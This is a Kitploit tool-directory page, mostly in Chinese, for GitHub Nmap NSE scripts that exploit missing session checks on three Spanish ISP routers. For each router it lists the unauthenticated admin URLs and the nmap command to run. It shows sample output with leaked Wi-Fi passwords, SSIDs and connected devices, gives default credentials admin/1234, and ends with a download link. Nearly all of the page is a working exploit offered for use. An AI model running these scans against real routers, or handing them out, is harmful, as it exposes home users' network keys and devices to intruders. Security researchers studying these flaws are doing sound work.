Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
scripts-nse — 一些用于从路由器搜索信息的NSE脚本 | Kitploit
工具/GitHubGitHub/danilabs/scripts-nse
侦察漏洞扫描器漏洞利用信息收集Web安全网络安全渗透测试
GitHubdanilabs/scripts-nse

scripts-nse

一些用于从路由器搜索信息的NSE脚本

查看仓库
362610年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

What is it?

一些用于从路由器搜索信息的 NSE 脚本。

这些脚本的作者是 VicenDominguez。他发现了华为的 0-Day 漏洞,我只将其修改用于另外两款设备。

该脚本的作者不对其使用负责。

#Huawei HG253s v2 Vodafone-Spain 开始向西班牙客户出租新款华为 HG253v2 路由器。这款新路由器配备了新的固件版本。

##漏洞 基本上,它没有验证某些管理网页中的会话 cookie。 因此,可以从未经认证的互联网开放路由器的这些 URL 直接获取信息。

  • http://IPhtml_253s/api/ntwk/WlanBasic
  • http://IP/html_253s/api/system/diagnose_internet
  • http://IP/html_253s/api/system/hostinfo?type=ethhost
  • http://IP/html_253s/api/system/hostinfo?type=guesthost
  • http://IP/html_253s/api/system/hostinfo?type=homehost
  • http://IP/html_253s/api/system/hostinfo?type=wifihost
  • http://IP/html_253s/api/system/wizardcfg

##用法

root@kitploit:~
nmap --script=http-enum-vodafone-hua253s.nse -p80,443 -sS x.x.x.x

Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT    STATE SERVICE
80/tcp  open  http
| http-enum-vodafone-hua253s: 
|   SSID: vodafone070 (14:b9:XX:XX:XX:XX) Password: (AES) 123456
|   Device: android-246e67b281179679-Wireless MAC: 48:5A:3F:XX:XX:XX IP: 192.168.0.XX

#Comtrend VG 8050 Telefonica-Spain 开始向西班牙客户出租新款 Comtrend VG 8050 路由器。这款新路由器配备了新的固件版本。 该漏洞由 DaniLabs 发现。

##漏洞 基本上,它没有验证某些管理网页中的会话 cookie。 因此,可以从未经认证的互联网开放路由器的这些 URL 直接获取信息。

  • http://IP/getWifiInfo.jx
  • http://IP/listDevices.jx
  • http://IP/infoApplications.jx

##用法

root@kitploit:~
nmap --script=http-enum-telefonica-comtrend-vg-8050.nse -p80,443 -sS x.x.x.x

Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT    STATE SERVICE
80/tcp  open  http
| http-enum-telefonica-comtrend-vg-8050: 
|   SSID: MOVISTAR_XXX
|   Cipher Algorithm: WPA
|   Password WEP: 
|   Password WPA: gTU3NkXE44RYjuM2RrxM
|   Password WPA2: 
|   Device: 192.168.0.X MAC: 5c:97:X:X:X:X IP: 192.168.0.X

#ADB P.DGA4001N a.k.a HomeStation Telefonica-Spain 开始向西班牙客户出租新款 ADB P.DGA4001N 路由器。这款新路由器配备了新的固件版本。 该漏洞由 DaniLabs 发现。

##漏洞 基本上,它没有验证某些管理网页中的会话 cookie。 因此,可以从未经认证的互联网开放路由器的这些 URL 直接获取信息。

  • http://IP/getWifiInfo.jx
  • http://IP/listDevices.jx
  • http://IP/infoApplications.jx

默认凭据为 admin / 1234。 ##用法

root@kitploit:~
nmap --script=http-enum-telefonica-homestation.nse -p80,443 -sS x.x.x.x

Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT    STATE SERVICE
80/tcp  open  http
| http-enum-telefonica-homestation: 
|   SSID: WLAN_HOME
|   Cipher Algorithm: WEP
|   Device: IphonePedro MAC: A8:8E:24:X:X:X IP: 192.168.1.X

下载工具